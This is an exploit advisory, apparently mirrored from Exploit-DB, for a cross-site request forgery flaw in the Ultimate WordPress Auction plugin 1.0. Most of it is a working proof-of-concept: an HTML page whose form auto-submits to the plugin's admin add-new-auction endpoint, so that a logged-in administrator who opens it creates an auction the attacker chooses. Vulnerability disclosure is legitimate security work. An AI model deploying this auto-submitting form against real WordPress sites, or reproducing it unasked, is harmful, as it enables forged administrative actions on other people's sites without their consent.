WordPress Plugin Ultimate WordPress Auction Plugin 1.0 – Cross-Site Request Forgery

  • 作者: expl0i13r
    日期: 2013-06-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/26240/
  • =============================================================
__ _______ __ ____ 
\ \ / / | |/ _ \(_) /_ | |___ \
 ___ \ V / _ __ | | | | | |_ | | __) |_ __ 
/ _ \ > < | '_ \| | | | | | | || ||__ <| '__|
 |__// . \| |_) | | | | |_| | | || |___) | | | 
\___| /_/ \_\ | .__/|_|\___/|_||_| |____/|_| 
| |
|_|blackpentesters.blogspot.com
=============================================================

##############################################################################
# Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ]
# Date: [2013-6-15]							 	
# Exploit Author: [expl0i13r]						 	 	
# Vendor Homepage: [http://wordpress.org/plugins/ultimate-auction/] 				
# Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip] 	
# Version: [1.0]			 			
# Tested on: [Wordpress 3.5.1 (Windows)]						
# Contact: expl0i13r@gmail.com						 	
##############################################################################


1. Plugin Description:
========================

The Ultimate WordPress Auction plugin allows easy and quick way to set up a professional auction website in ebay style.

2. Vulnerability Description:
==============================

This wordpress plugin "Ultimate WordPress Auction 1.0" suffers from CSRF vulnerability which can be successfully exploited by attacker to add Fake Auction Bids.


Affected URL:
--------------

http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction


eXpl0it code:
--------------

<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
 	document.getElementById('myForm').submit();
}
</script>
</head>
<body>

<form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate">

Link: http://blackpentesters.blogspot.in/
Title: 
<input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter">
Description:
<textarea name="auction_description" type="text" id="auction_description" cols="50" rows="10" class="large-text code valid">&lt;/textarea&gt;
<input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value="">
<input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value="">
<input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value="">
<input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00">
<input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value="">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes">

</form>

<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

Once victim clicks on this link new auction of attackers choice will be added.(provided victim logged in to wordpress)


##################################
# eXpl0i13r#
# ------------------------------ #
#|blackpentesters.blogspot.com	|#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################